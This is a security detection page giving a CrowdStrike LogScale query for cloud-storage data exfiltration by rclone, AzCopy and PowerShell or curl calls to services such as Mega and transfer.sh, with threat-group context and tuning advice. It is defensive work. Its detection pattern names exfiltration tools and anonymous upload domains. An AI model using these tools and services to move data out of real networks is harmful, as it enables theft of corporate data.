Detect Data Exfiltration via Cloud Storage Services in CrowdStrike LogScale
Exfiltration of corporate data to attacker-controlled cloud storage is a dominant technique in double-extortion ransomware campaigns and espionage operations. Adversaries use legitimate cloud storage services (Mega, Dropbox, OneDrive, Box, Google Drive, rclone, AzCopy, ShareFile) to blend exfiltration traffic with normal business activity, bypassing egress monitoring that blocks unknown C2 IPs. Scattered Spider used Mega for SMB data exfiltration before ransomware deployment in 2024-2025. Akira and Black Basta affiliates use rclone with SFTP/cloud backends. Lazarus Group favors Dropbox and Google Drive. Key indicators: rclone.exe or azcopy.exe execution with external cloud endpoints, large outbound data transfers to cloud storage IPs, WinSCP or FileZilla used for bulk data staging, and PowerShell Invoke-WebRequest with cloud storage URLs. Detection opportunity exists in the staging phase (file collection before transfer) and the transfer phase (network and process telemetry).
MITRE ATT&CK
- Tactic
- Exfiltration
LogScale Detection Query
#event_simpleName=ProcessRollup2
| ImageFileName=/(?i)rclone\.exe$/
OR (ImageFileName=/(?i)azcopy\.exe$/ AND CommandLine=/(?i)(blob|file|queue)\.core\.windows\.net/)
OR (ImageFileName=/(?i)(powershell|pwsh|curl|wscript|cscript)\.exe$/
AND CommandLine=/(?i)(mega\.nz|mega\.io|dropbox\.com|dropboxapi\.com|transfer\.sh|gofile\.io|box\.com|box\.net|drive\.google\.com|onedrive\.live\.com|sharefile\.com|sendspace\.com|filebin\.net|anonfiles\.com)/)
| ThreatType := case {
ImageFileName=/(?i)rclone/ => "Exfil_Rclone";
ImageFileName=/(?i)azcopy/ => "Exfil_AzCopy";
* => "Exfil_CloudStorage"
}
| RiskScore := case {
ThreatType = "Exfil_Rclone" => 85;
ThreatType = "Exfil_AzCopy" => 80;
* => 70
}
| groupBy(
[ComputerName, UserName, ImageFileName, ThreatType],
function=[
count(as=EventCount),
max(field=RiskScore, as=MaxRisk),
collect(CommandLine, limit=10)
]
)
| sort(field=MaxRisk, order=desc)CrowdStrike LogScale (Falcon) detection query using ProcessRollup2 endpoint telemetry to identify cloud storage data exfiltration. Matches rclone.exe execution (high-fidelity indicator used by Akira, Black Basta, and Scattered Spider affiliates), AzCopy with external Azure storage account URLs, and PowerShell or curl commands referencing cloud storage and anonymous upload domains. Aggregates by host, user, and threat type to expose campaign-level activity and surfaces the top 10 distinct command lines per group for analyst review.
Data Sources
Required Tables
False Positives & Tuning
- Authorized data migration service accounts: infrastructure teams running rclone under named service accounts for approved cloud migrations — tag the source hosts with a Falcon host group (e.g., 'authorized-migration-hosts') and add a NOT ComputerName in authorized_migration_hosts filter before the groupBy to suppress known-good systems
- Azure DevOps or GitHub Actions build agents: AzCopy executed by CI/CD runners for artifact deployment to Azure Blob Storage — use Falcon host tags to identify pipeline runner systems and exclude their ComputerName values, while retaining events in a lower-priority audit groupBy for compliance logging
- Desktop sync client background processes: Dropbox, Box, or OneDrive sync daemons spawning curl or PowerShell subprocesses for authentication and sync operations — inspect the ParentBaseFileName field to distinguish sync daemon child processes from user-initiated or script-driven executions, and add ParentBaseFileName NOT IN ('Dropbox.exe', 'Box.exe', 'OneDrive.exe') to the filter
Other platforms for THREAT-CloudStorage-DataExfil
Testing Methodology
Validate this detection against 1 adversary technique from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Simulate Cloud Exfiltration via rclone to Mega
Expected signal: Sysmon Event ID 1: rclone.exe with copy command targeting mega remote. Sysmon Event ID 3: network connection to mega.co.nz or api.mega.co.nz.
Unlock Pro Content
Get the full detection package for THREAT-CloudStorage-DataExfil including response playbook, investigation guide, and atomic red team tests.